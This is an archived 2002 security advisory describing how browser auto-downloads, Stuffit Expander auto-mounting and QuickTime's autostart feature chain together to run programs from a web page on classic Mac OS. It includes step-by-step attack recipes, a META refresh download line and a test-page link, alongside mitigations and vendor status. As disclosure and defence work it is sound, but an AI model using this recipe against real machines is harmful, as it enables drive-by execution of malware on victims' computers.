Auto file execution vulnerability in Mac OS <http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html> [Overview] We found a vulnerability in Mac OS and Mac OS X with Classic Environment. If victims only browse malicious web-page; 1.Browsers start automatically download a compressed disc-image file which includes malicious program. 2.Archivers --such like Stuffit Expander-- automatically expand the compressed file, and mount the disc-image. 3.Mac OS (QuickTime) executes the malicious program included in the disc-image. It depends on QuickTime settings. These 3 processes are done full-automatically, and end in an instant. [Detail] The vulnerability which we found is based on 3 vulnerabilities, and is generated by many software's complex relations. To explain the vulnerability, we summarize these 3 vulnerabilities in below. ---------------------------------------------------------------------- --Vuln.1 (already announced at Bugtraq) "Macinosh IE file execuion vulerability" [BugTraq] 2002 Jan.22 from Jass Seljamaa He reports the vulnerable systems are "IE 5.0, probably earlier, on Classic systems(below OS X)" in this contribute, however, the vulnerable system which we found are; --Microsoft Internet Explorer 5.0 through 5.1.3 --iCab Pre 2.7 and 2.7.1 This means, malicious users can execute local programs in Macintosh using web pages. But it's able to only execute programs exist in full file-path in Macintosh which known by a malicious users. ---------------------------------------------------------------------- --Vuln.2 (probably announced in Japan only) Next day to Vuln.1 is reported, a Japanese user, Mr. Mori presents other vulnerability related to Vuln.1 at "Security Hole memo". <http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie> (written in Japanese) This vulnerability, similar to Vuln.1, is observed when the web pages in which META-tag mentioned below is used are browsed. <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/ some.sit"> Ater these pages are browsed, malicious programs are downloaded automatically. So, malicious users use combination of Vuln. 1 and Vuln. 2 can force victims to download the program and execute it. But, to force to execute the program, the malicious users must know the full file-path of download folders in victims' Macintosh. vulnerable browsers (in our test) : Microsoft Internet Explorer 4.5 through 5.1.3 Netscape Communicator 4.78 Netscape 6.2*1 Mozilla 0.9.7*1 iCab Pre 2.7 and 2.7.1 Opera 5.0 OmniWeb 4.0.6 and 4.1beta11 *1: Netscape 6.2 and Mozilla shows dialog before download. ---------------------------------------------------------------------- --Vuln. 3 (we found, probably announced in Japan only) According to Vuln.1 and 2, we found other vulnerability, malicious users can launch arbitrary programs without to know full file-path. Step 1 : Make a disk image that contains malicious program. Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin also effective) Step 3 : Upload this *.sit file to some website and prepare a web page using Vuln.1 and 2 Step 4 : Victims browse the web page the *.sit file is downloaded automatically.* Step 5 : Stuffit Expander automatically extracts the *.sit file and mounts the disk image. Step 6 : The malicious program in the disk image is executed automatically by browsers.* *Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1. Because of using disk image, malicious users are free to file-path of download folder. It's necessary to only prepare malicious programs and web pages. In this vulnerability, Stuffit Expander plays an important role. It does automatic extraction and auto-mount disk images. So, in consists of Vuln.1, browsers execute the program. vulnerable systems (in our test) : Stuffit Expander 5.x through 6.5.1 for Mac OS Stuffit Expander 6.5 or higher version for Mac OS X*1 Microsoft Internet Explorer 5.0 through 5.1.3 iCab Pre 2.7 and 2.7.1 *1: Stuffit Expander 6.0 for X is not affected. We make a test page for this vulnerability. Please try it. http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/ ---------------------------------------------------------------------- Auto file execution vulnerability in Mac OS ---------------------------------------------------------------------- According to Vuln.1 to Vuln.3, we explain the "Auto file execution vulnerability in Mac OS". This vulnerability which we found uses Vuln.2 and 3 but Vuln.1. It is coused by many software's complex relations, such as browsers (and network-clients) and Stuffit Expander and QuickTime. It's like the computer-virus "AutoStart9805" using "Autostart CD-ROMs" of QuickTime. In this way, similar to Vuln.3, malicious users can launch arbitrary programs without to know full file-path. Step 1 : Make a disk image that contains "autostart" malicious program. Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin also effective) Step 3 : Upload this *.sit file to some website and prepare a web page using Vuln. 2. Step 4 and 5 is same as Vuln. 3. Step 6 : The program in the image is executed automatically by "Autostart CD-ROMs" of QuickTime. In this vulnerability, 1. browser downloads the *.sit in consists of Vuln.2. 2. then, Stuffit Expander does automatic extraction and auto-mount the disk image. 3. and then, QuickTime executes the program in the image. These are initial settings of each one. It's a teamwork. Only needs one click in web page, It will start automatic download, extraction, mounting, and execution. Furthermore, if victims manually download malicious disk image with browsers or other network clients (like Fetch via FTP), automatic extraction, mounting, execution will start. vulnerable systems : MacOS 9.x, and Mac OS X with Classic environment*1 (probably System 7.5.x or higher) Quick Time 2.0 or higher version (probably)*2 Stuffit Expander 5.x or higher version for Mac OS Stuffit Expande 6.5 or higher versionr for Mac OS X*3 All browser and network-client using Stuffit Expander in post-process for download*4 *1: using Mac OS X by oneself is not affected. *2: "Autostart CD-ROMs" is supported since QuickTime 2.0. *3: Stuffit Expander 6.0 for X is not affected. *4: Netscape 6.x and Mozilla shows dialog before download. *4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not. *4: We've tested Fetch 3.0.3, NetFinder v2.3.1, Vicomsoft FTP Client 3.0.1. These are vulnerable. [Exploit] We make a test page for this vulnerability. Please try it. <http://www.u-struct.com/diary/img/20020131_OSissue_E/> When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is downloaded and extracted, and disk image "Exploit_HD_OSX" is mounted, and application "openTrash" is launched automatically. "openTrash" is application that prompt "This application opens trash only" and open trash only. [Solutions] Change the initial settings of each ones below. In Mac OS : ++required settings - "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off. - Stuffit Expander > preferences > Disk images > "Mount Disk Images" > turn off. - Change the initial Volume name (ex. Macintosh HD) to other. - Change the initial "Download Folder" (ex. Desktop Folder) of browsers to other. ++more secure settings (not required) - Stuffit Expander > preferences > Expanding > "Continue to expand" > turn off. - Each Browsers and network-clients > each preference > change download setting using Stuffit Expander in post-process to "save to file" - Each Browsers > each preference > change download settings to "disable" * * such as in Internet Explorer, set the "Security Zones" to "high" or "custom" (File downloads to "Disable"). In Mac OS X with Classic environment : - Classic's "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.* - Others are same as in Mac OS. * "Autostart CD-ROMs" is influenced with Classic's "QuickTime setting". So, when Classic environment is not booted, Mac OS X is not affected. Please refer to the following URL about more detailed solutions. <http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html> [vendor status] - mozilla.org (Bugzilla) They set our report as "security sensitive". <http://bugzilla.mozilla.org/show_bug.cgi?id=123152> - icab.de A Japanese iCab user (not us) has already reports to icab.de already. They reply for solutions, and have expressed correspondence. (But there is no infomation about it in their web site now.) - microsoft.com and microsoft.co.jp They have expressed correspondence to Vuln.1 (But there is no infomation about it in their web site now.) - other vendors no reply or auto reply ---------------------------------------------------------------------- [comment] We've reported to related vendors* at Feb.3, and contribute this vulnerability to BugTraq regardless of vendor correspondence. Because we already announce this vulnerability in Japan, at our web-site and "Security Hole memo ML". Probably, thousands of Japanese users already know this vulnerability. (these are in Japanese Language) <http://www.u-struct.com/diary/view.cgi?ID=s20020128002516> <http://homepage.mac.com/vm_converter/200202_diary.html#20020128_AutoStart_vuln> <http://memo.st.ryukoku.ac.jp/archive/200202.month/2846.html> *:apple.com, apple.co.jp, microsoft.com, microsoft.co.jp, aladdinsys.com, act2.co.jp, netscape.com, netscape.co.jp, mozilla.org (Bugzilla), icab.de, omnigroup.com, opera.com. [credit] vm_converter <vm_converterat_private> FUJII Taiyo <taiyoat_private>
This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 15:24:45 PST